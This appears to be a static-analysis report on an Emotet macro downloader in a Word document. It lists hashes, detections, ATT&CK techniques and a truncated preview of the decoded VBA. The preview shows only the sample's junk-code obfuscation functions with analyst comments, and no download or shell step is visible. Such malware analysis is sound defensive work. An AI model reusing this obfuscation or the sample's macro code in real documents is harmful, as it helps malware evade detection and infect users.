Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 63f61cf60d70a2dc…

MALICIOUS

Office (OLE)

168.6 KB · Created: 2018-07-24 10:30:00 · Authoring application: Microsoft Office Word · First seen: 2018-08-05
MD5: a946c67903c5c286f1a70b625e79ed32 · SHA-1: 52bc2597fa6a6cd65e7655fc77d43b4ff26c1c7a · SHA-256: 63f61cf60d70a2dc22eb6012f5c67ceb2aed7988d8835a5ed9f50ee0f3e8ee8e
Risk Score: 182

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 (Visual Basic) · T1059 (Command and Scripting Interpreter) · T1204.002 (Malicious File)

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6960064-0', indicating that it is a downloader. Critical heuristics confirm the presence of VBA macros and a Shell() call within the Document_Open macro (an auto-run handler that executes as soon as the document is opened with macros enabled). This strongly suggests that the macro is designed to download and execute a secondary payload, a common Emotet tactic.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6960064-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6960064-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard OOXML DrawingML schema namespace identifier that Office writes into documents; on its own it is not a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34805 bytes
SHA-256: 9dc022cf82c11648c6de9da555147508f3bc21a9c291e348525c1c4354f137dc
Preview script
First 1,000 lines of the extracted script
' Module header as exported by olevba (decoded VBA source). Attribute lines are
' compile-time metadata, not executable statements; the macro's behaviour is in
' the procedures that follow.
Attribute VB_Name = "cBDXlrSiww"
' VB_Name is the module's code name; its random-looking value matches the
' randomised procedure and variable names used in the procedures below.
' NOTE(review): VB_Base naming ThisDocument suggests this is the Word document
' module, which is where a Document_Open handler (reported by the
' OLE_VBA_DOCOPEN heuristic) would be defined — confirm in the full extracted source.
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
' VB_PredeclaredId = True: the module has a default (auto-created) instance.
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Procedure with no visible external effect.
' NOTE(review): none of the names used below (JzCuBC, zIKiqo, CszXU, ...) is
' declared with Dim in this function or assigned before it is read, and no
' Option Explicit appears in the listing; under implicit declaration they are
' Empty Variants, unless they are module-level variables declared elsewhere in
' the extracted source (not visible in this preview). The function never assigns
' its own name, so it returns Empty.
' NOTE(review): four near-identical If/Else blocks with randomised names whose
' results are never read is consistent with junk/padding code inserted to
' obfuscate the module — confirm against the remainder of macros.bas.
Private Function twXAiWH()
' Any run-time error raised below (e.g. division by zero when both operands of
' "/" are Empty) is ignored and execution continues at the next statement.
On Error Resume Next
   If JzCuBC <> zIKiqo Then
      CszXU = 137497106 * viBZE
      Else
      ' Taken when both operands compare equal (e.g. both Empty); the same
      ' shape repeats in the three blocks below.
      JzmjoE = 42683 - 95455 - (93170 + aXWzO / TQNlt + jhrjqU) * 1702 * vdpLsn - 25788 + 52907
      If dUrdw >= ZBWzr Then
         kLSvY = EpFOC
      End If
   End If
   If KzhKF <> qsvjQC Then
      nQSiT = 137497106 * JTLRX
      Else
      UZImQ = 30620 - 35527 - (89272 + lUrqR / BTpbC + QaoWWu) * 65203 * wzfKuk - 3768 + 64456
      If iTwIw >= vbrBv Then
         AWpUX = wUPtV
      End If
   End If
   If Mmojw <> WTNKHD Then
      TZsvfs = 137497106 * fzdpqW
      Else
      DNqlwN = 1931 - 68270 - (27997 + uvUZo / LiRmkZ + TOdwcO) * 18518 * qZATGW - 47462 + 17669
      If jkKlAj >= MqKRH Then
         kwdlX = VPYUE
      End If
   End If
   If hMMIPE <> KbGZzv Then
      oVcBs = 137497106 * WTOGju
      Else
      RqsuD = 4082 - 61360 - (92773 + PZYaYW / LiFzv + fGVPvU) * 26419 * GbVjXU - 68237 + 22379
      If vPEtF >= dSXAz Then
         cawci = mZoGL
      End If
   End If
End Function
' Procedure with no visible external effect.
' NOTE(review): each block is guarded by "<name> = 14" where <name> is never
' assigned in this function and not declared with Dim (no Option Explicit in
' the listing). If these are Empty Variants the test is False and every block is
' skipped; if they are module-level variables set elsewhere in the extracted
' source (not visible here) the arithmetic runs but its results are never read.
' The function never assigns its own name, so it returns Empty.
' NOTE(review): six blocks of the same shape with randomised names is
' consistent with junk/padding code — confirm against the rest of macros.bas.
Private Function zSfPlks()
' Run-time errors raised below are ignored and execution continues.
On Error Resume Next
   If JkVzp = 14 Then
      SuNYW = iiziU - 576 - 11146 / NtbjBV + bRarbP / mNDDh - CkCfB - wZEbi
      pEzPI = 72132 - UKrcnh * 88908 + OsjiQS * 96279 * 82681
   End If
   If rDXpRM = 14 Then
      cYRGWU = AcwiT - 38885 - 87335 / PdAGD + tWmOF / wOlRIa - jUqvl - BzjsVO
      BhouoL = 18044 - jBisRZ * 46788 + rfasFM * 78947 * 47173
   End If
   If PBOMi = 14 Then
      zHtQa = czRbwS - 22487 - 6447 / RcLpM + VrosPM / vHYXX - sKjHL - CcbdQ
      MivwY = 6515 - RUiQE * 45782 + iDBJD * 48561 * 90170
   End If
   If UoisMF = 14 Then
      bUocQ = BXkQv - 86978 - 25267 / wwsaDw + oHfkIC / LMSmDI - hCBXf - RbJCL
      wWqpSJ = 13431 - nMJsI * 4201 + LYzJp * 8692 * 64795
   End If
   If vitZaX = 14 Then
      rSmLWW = SFNzL - 15419 - 28404 / HThhVw + GrNTY / DEvjU - wPHcsV - MLFAfV
      zaZrtB = 88921 - LvwCz * 84435 + ASOqW * 35327 * 67789
   End If
   If zvsji = 14 Then
      SwZzJD = wQcbM - 84893 - 2053 / IjFViE + zPhbB / SdrQX - btDfVA - WOnKYA
      dpMmOA = 90020 - wJRhB * 83678 + nkLoMZ * 96022 * 9920
   End If
End Function
' Procedure with no visible external effect; same shape as twXAiWH above with
' different randomised names and constants.
' NOTE(review): no name used below is declared with Dim or assigned before it
' is read, and no Option Explicit appears in the listing, so under implicit
' declaration they are Empty Variants (unless declared at module level in the
' part of the extracted source not shown here). The function never assigns its
' own name, so it returns Empty. Repeated no-op blocks like these are consistent
' with junk/padding code — confirm against the rest of macros.bas.
Private Function UGiQnZbCzO()
' Any run-time error raised below (e.g. division by zero when both operands of
' "/" are Empty) is ignored and execution continues at the next statement.
On Error Resume Next
   If XRFrGS <> JwNit Then
      nYhui = 137497106 * LwuVV
      Else
      ' Taken when both operands compare equal (e.g. both Empty); the same
      ' shape repeats in the three blocks below.
      KvAlP = 39606 - 90813 - (11248 + SCuhN / XTftz + ddBizB) * 83162 * rcvjVw - 44117 + 44321
      If htjnA >= VnNQC Then
         dPcYpj = zHQSD
      End If
   End If
   If qGKMR <> zvzANt Then
      Ifrlko = 137497106 * NMTLjP
      Else
      YQRaf = 35244 - 53393 - (60408 + cBzJo / ScLvEK + QiiPZ) * 21781 * nwfBnb - 58705 + 61159
      If haAcQ >= klfHf Then
         rAkLuE = nsQsQ
      End If
   End If
   If FwITX <> roWiN Then
      TjOBN = 137497106 * OrjiVL
      Else
      RuSrN = 57266 - 17988 - (1981 + uuCpM / zGFOjv + dsjTw) * 305 * ZXdzz - 10610 + 25391
      If wIAEB >= pUzYT Then
         uccHcb = RZLtfJ
      End If
   End If
   If iFmlE <> rRpEpU Then
      BnaLPG = 137497106 * wODGHt
      Else
      izhwPv = 8352 - 87253 - (30986 + nQMRnf / RNRll + rjINW) * 29568 * jdKNI - 37849 + 15547
      If ZZvHX >= XztLIj Then
         oucszz = NHihdO
      End If
   End If
End Function
Private Function VzWMEmCdUDh()
On Error Resume Next
   If awHIhi = 14 Then
      RMAAYn = bhbIQR - 3745 - 7510 / jpMFK + AuLpZj / WCijsc - LtfUq - ptCwYp
      uXTUY = 65548 - LFpiN * 99400 + KYZjZZ * 87826 * 80107
   End If
   If jzazj = 14 Then
      MwXNc = rCkFXQ - 8847 - 65478 / vVQsh + OEcJFP / EjXYX - FajwL - piBlHI
      KtlcKF = 3923 - wrvDX * 60667 + zAiwsw * 54865 * 77307
   End If
   If FLsOM = 14 Then
      UAbER = HMTVh - 13280 - 67468 / snBJlB + JPhiF / DEtJK - YbCwaN - sVfWPV
      YfRKi = 57185 - QKluW * 23710 + DIZMWU * 2048
... (truncated)